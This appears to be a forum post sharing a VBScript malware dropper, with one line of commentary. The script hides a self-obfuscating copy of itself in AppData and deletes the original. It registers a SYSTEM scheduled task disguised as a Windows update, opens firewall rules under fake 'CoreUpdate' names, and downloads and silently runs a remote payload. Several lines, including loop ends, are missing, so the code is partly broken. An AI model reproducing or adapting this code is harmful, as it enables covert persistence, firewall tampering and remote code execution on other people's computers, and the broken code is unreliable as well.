Some actions of this script are clear e.g. the section that adds firewall rules, others not so much
On Error Resume Next
Sub F27()
Dim E13C563AFCB34, C0009B48F34B, C8, BEBE2817704748838CC96E, B37C
With CreateObject("WScript.Shell")
C0009B48F34B = Replace(Mid(CreateObject("Scriptlet.TypeLib").Guid, 2, 36), "-", "")
E13C563AFCB34 = .Environment("process")("appdata") & "\" & Replace(Mid(CreateObject("Scriptlet.TypeLib").Guid, 2, 36), "-", "") & "\"
With CreateObject("Scripting.FileSystemObject")
C8 = .GetParentFolderName(WScript.ScriptFullName) & "\"
BEBE2817704748838CC96E = "." & .GetExtensionName(WScript.ScriptFullName)
EA E13C563AFCB34
With .OpenTextFile(WScript.ScriptFullName, 1, False, -2) ' -2 - System default, -1 - Unicode, 0 - ASCII
B37C = .ReadAll
End With
If LCase(BEBE2817704748838CC96E) = ".vbe" Then
B37C = B64C32BB17144(B37C)
B37C = FA2(B37C)
B37C = C87E(B37C)
B37C = FA2(B37C)
End If
With .OpenTextFile(E13C563AFCB34 & C0009B48F34B & BEBE2817704748838CC96E, 2, True, -1)
.Write B37C
End With
.DeleteFile WScript.ScriptFullName, True
With .GetFolder(C8)
If .Files.Count = 0 And .SubFolders.Count = 0 Then
.Delete True
End If
End With
End With
.Run "schtasks /create /ru system /tn WindowsTaskCoreUpdate /sc onstart /tr """ & E13C563AFCB34 & C0009B48F34B & BEBE2817704748838CC96E & """ /f /rl highest", 0, True
End With
End Sub
Sub EA(D9CC7)
With CreateObject("Scripting.FileSystemObject")
If Not .FolderExists(D9CC7) Then
EA .GetParentFolderName(D9CC7)
.CreateFolder D9CC7
With .GetFolder(D9CC7)
.Attributes = .Attributes Or 2
End With
End If
End With
End Sub
Sub F10()
E306B "WindowsIndexerCoreUpdate", WScript.FullName
End Sub
Sub E306B(B2D50C09F74D4D98929, F442D4A1)
With CreateObject("WScript.Shell")
.Run "netsh advfirewall firewall add rule name=""" & B2D50C09F74D4D98929 & """ dir=in action=allow description=""" & B2D50C09F74D4D98929 & """ program=""" & F442D4A1 & """ enable=yes", 0, True
.Run "netsh advfirewall firewall add rule name=""" & B2D50C09F74D4D98929 & """ dir=out action=allow description=""" & B2D50C09F74D4D98929 & """ program=""" & F442D4A1 & """ enable=yes", 0, True
End With
End Sub
Sub A0()
Dim CECCA989
For Each CECCA989 In Array("", "", "", "", "", "", "")
With GetObject("winmgmts:{impersonationLevel=Impersonate}!\\.\root\CIMV2:Win32_PingStatus.Address='" & CECCA989 & "'")
Select Case True
Case IsNull(.StatusCode)
Case .StatusCode <> 0
Case Else Exit Sub
End Select
End With
WScript.Sleep 10000
End Sub
Sub DBCF()
Dim CECCA989, F442D4A1, AEF, C
F442D4A1 = CreateObject("WScript.Shell").Environment("process")("temp") & "\steam.vbe"
For Each CECCA989 In Array(_
"", _
"", _
CE9FC81B15 CECCA989, F442D4A1, AEF, C
If AEF = 200 And C = 0 Then Exit For
If IsEmpty(CECCA989) Then Exit Sub
If LCase(Right(F442D4A1, 4)) = ".exe" Then E306B "WindowsGenericCoreUpdate", F442D4A1
CreateObject("WScript.Shell").Run F442D4A1, 0, True
End Sub
Sub CE9FC81B15(CECCA989, F442D4A1, AEF, C)
Dim C5A1C339
On Error Resume Next
C = 0
With CreateObject("MSXML2.XMLHTTP")
.Open "GET", CECCA989, False
AEF = .status
If AEF <> 200 Then Exit Sub
C5A1C339 = .responseBody
End With
C = Err.Number
If C <> 0 Then Exit Sub
With CreateObject("Scripting.FileSystemObject")
If .FileExists(F442D4A1) Then .DeleteFile F442D4A1, True
End With
C = Err.Number
If C <> 0 Then Exit Sub
With CreateObject("ADODB.Stream")
.Type = 1
.Write C5A1C339
.SaveToFile F442D4A1, 2
End With
C = Err.Number
End Sub
Function FA2(ByVal D9FF4E5DA8)
Dim D9, CCD2479A6F784D5E9B13C7D, C01A, CD10282927844, C1, CA2C09B1068, DE, D3, E5, B1723AC3, CB59D564B, B39C9BDF
Set D9 = CreateObject("Scripting.Dictionary")
Set CCD2479A6F784D5E9B13C7D = CreateObject("Scripting.Dictionary")
Set C01A = CreateObject("Scripting.Dictionary")
With New RegExp
.IgnoreCase = True
.Multiline = True
.Pattern = "(?:""(?:""""|[^""\n])*?""(?!""))"
CD10282927844 = 0
Set C1 = .Execute(D9FF4E5DA8)
If C1.Count = 0 Then Exit Do
CA2C09B1068 = "%" & CD10282927844 & "%"
If Instr(D9FF4E5DA8, CA2C09B1068) = 0 Then Exit Do
CD10282927844 = CD10282927844 + 1
D9FF4E5DA8 = .Replace(D9FF4E5DA8, CA2C09B1068)
CCD2479A6F784D5E9B13C7D(CA2C09B1068) = C1(0).Value
D9FF4E5DA8 = Replace(D9FF4E5DA8, ":", vbCrLf & ":" & vbCrLf)
.Global = True
.Pattern = "(\bthen )(.+)"
D9FF4E5DA8 = .Replace(D9FF4E5DA8, "$1" & vbCrLf & Chr(0) & vbCrLf & "$2")
.Pattern = "^[ \t]*(?:(?:private|public|public[ \t]+default)[ \t]+)?(?:function|sub|property[ \t]+(?:let|set|get))[ \t]+([a-z]\w*)[ \t]*\((.*)\)[ \t]*(?:$|'.*$)"
For Each DE In .Execute(D9FF4E5DA8)
D9(DE.SubMatches(0)) = ""
D3 = DE.SubMatches(1)
With New RegExp
.Global = True
.IgnoreCase = True
.Pattern = "(?:\b(?:byval|byref)[ \t]+)?([a-z]\w*)[ \t]*"
For Each E5 In .Execute(D3)
D9(E5.SubMatches(0)) = ""
End With
.Pattern = "^[ \t]*(?:dim|redim[ \t]+preserve|redim)[ \t]+(.*?)[ \t]*(?:$|'.*$)"
For Each DE In .Execute(D9FF4E5DA8)
D3 = DE.SubMatches(0)
With New RegExp
.Global = True
.IgnoreCase = True
.Pattern = "\([^\(]*?\)"
Do While .Test(D3)
D3 = .Replace(D3, "")
End With
For Each B1723AC3 In Split(D3, ",")
D9(Trim(B1723AC3)) = ""
.Pattern = "^[ \t]*class[ \t]+([a-z]\w*)[ \t]*(?:$|'.*$)"
For Each DE In .Execute(D9FF4E5DA8)
D9(DE.SubMatches(0)) = ""
.Pattern = "^[ \t]*for[ \t]+each[ \t]+([a-z]\w*)[ \t]+in[ \t]+.+(?:$|'.*$)"
For Each DE In .Execute(D9FF4E5DA8)
D9(DE.SubMatches(0)) = ""
.Pattern = "^[ \t]*for[ \t]+([a-z]\w*)[ \t]*\=[ \t]*.+(?:$|'.*$)"
For Each DE In .Execute(D9FF4E5DA8)
D9(DE.SubMatches(0)) = ""
.Pattern = "^[ \t]*(?:(?:set|const)[ \t]+)?([a-z]\w*)[ \t]\=[ \t]*.+(?:$|'.*$)"
For Each DE In .Execute(D9FF4E5DA8)
D9(DE.SubMatches(0)) = ""
D9FF4E5DA8 = Replace(D9FF4E5DA8, vbCrLf & Chr(0) & vbCrLf, "")
D9FF4E5DA8 = Replace(D9FF4E5DA8, vbCrLf & ":" & vbCrLf, ":")
CD10282927844 = 0
C01A("") = ""
For Each CB59D564B In D9
.Pattern = "\b" & CB59D564B & "\b"
B39C9BDF = Left(Replace(Mid(CreateObject("Scriptlet.TypeLib").Guid, 2, 36), "-", ""), 32 * Rnd * Rnd ^ 8 + 1)
Do While IsNumeric(Left(B39C9BDF, 1))
B39C9BDF = Mid(B39C9BDF, 2)
If Not (C01A.Exists(B39C9BDF) Or D9.Exists(B39C9BDF)) Then
C01A(B39C9BDF) = ""
Exit Do
End If
D9FF4E5DA8 = .Replace(D9FF4E5DA8, B39C9BDF)
D9(CB59D564B) = B39C9BDF
CD10282927844 = CD10282927844 + 1
.Global = False
.Pattern = "(\bgetref[ \t]*\([ \t]*)(%\d+%)([ \t]*\))"
Set C1 = .Execute(D9FF4E5DA8)
If C1.Count = 0 Then Exit Do
CA2C09B1068 = C1(0).SubMatches(1)
CB59D564B = CCD2479A6F784D5E9B13C7D(CA2C09B1068)
CB59D564B = Mid(CB59D564B, 2, Len(CB59D564B) - 2)
If D9.Exists(CB59D564B) Then
D9FF4E5DA8 = .Replace(D9FF4E5DA8, "$1""" & D9(CB59D564B) & """$3")
D9FF4E5DA8 = Replace(D9FF4E5DA8, CA2C09B1068, CCD2479A6F784D5E9B13C7D(CA2C09B1068))
End If
For Each CA2C09B1068 In CCD2479A6F784D5E9B13C7D
D9FF4E5DA8 = Replace(D9FF4E5DA8, CA2C09B1068, CCD2479A6F784D5E9B13C7D(CA2C09B1068))
End With
FA2 = D9FF4E5DA8
End Function
Function C87E(E00CD)
Dim E0841EA011
set E0841EA011 = CreateObject("Scripting.Encoder")
E00CD = E0841EA011.EncodeScriptFile(".vbs", E00CD, 0, "")
If Asc(Right(E00CD, 1)) = 0 Then E00CD = Left(E00CD, Len(E00CD) - 1)
C87E = E00CD
End Function
Function B64C32BB17144(E00CD)
Dim F7C49787803847
Dim AF5716
AF5716 = 0
F7C49787803847 = InStr(E00CD, "#@~^")
If F7C49787803847 > 0 Then
If InStr(F7C49787803847, E00CD, "==") - F7C49787803847 = 10 Then
AF5716 = InStr(F7C49787803847, E00CD, "==^#~@")
If AF5716 > 0 Then
E00CD = _
Left(E00CD, F7C49787803847 - 1) & _
E6168(Mid(E00CD, F7C49787803847 + 12, AF5716 - F7C49787803847 - 12 - 6)) & _
Mid(E00CD, AF5716 + 6)
End If
End If
End If
Loop Until AF5716 = 0
B64C32BB17144 = E00CD
End Function
Function E6168(E00CD)
Const FE2573C60644DC = "1231232332321323132311233213233211323231311231321323112331123132"
Dim E0841EA011, CD10282927844, A0, D1619D105014E6, D383AB927646D, BA
Dim B1990EE1E94(127)
Set E0841EA011 = WSCript.CreateObject("Scripting.Encoder")
For CD10282927844 = 9 To 127
B1990EE1E94(CD10282927844) = "JLA"
For CD10282927844 = 9 To 127
BA = Mid(E0841EA011.EncodeScriptFile(".vbs", String(3, CD10282927844), 0, ""), 13, 3)
For D1619D105014E6 = 1 To 3
A0 = Asc(Mid(BA, D1619D105014E6, 1))
B1990EE1E94(A0) = Left(B1990EE1E94(A0), D1619D105014E6 - 1) & Chr(CD10282927844) & Mid(B1990EE1E94(A0), D1619D105014E6 + 1)
B1990EE1E94(42) = Left(B1990EE1E94(42), 1) & ")" & Right(B1990EE1E94(42), 1)
E00CD = Replace(Replace(E00CD, "@&", Chr(10)), "@#", Chr(13))
E00CD = Replace(Replace(E00CD, "@*", ">"), "@!", "<")
E00CD = Replace(E00CD, "@$", "@")
D383AB927646D = -1
For CD10282927844 = 1 To Len(E00CD)
A0 = Asc(Mid(E00CD, CD10282927844, 1))
If A0 < 128 Then D383AB927646D = D383AB927646D + 1
If (A0 = 9) Or ((A0 > 31) And (A0 < 128)) Then
If (A0 <> 60) And (A0 <> 62) And (A0 <> 64) Then
E00CD = _
Left(E00CD, CD10282927844 - 1) & _
Mid(B1990EE1E94(A0), Mid(FE2573C60644DC, (D383AB927646D Mod 64) + 1, 1), 1) & _
Mid(E00CD, CD10282927844 + 1)
End If
End If
E6168 = E00CD
End Function
C9B0C270511241EBBF8 ""
Function C9B0C270511241EBBF8(F3)
Dim B3996
Set B3996 = CreateObject("MSXML2.ServerXMLHTTP")
B3996.setTimeouts 0, 0, 0, 0
B3996.Open "GET", F3, False
C9B0C270511241EBBF8 = B3996.responseText
Set B3996 = Nothing
End Function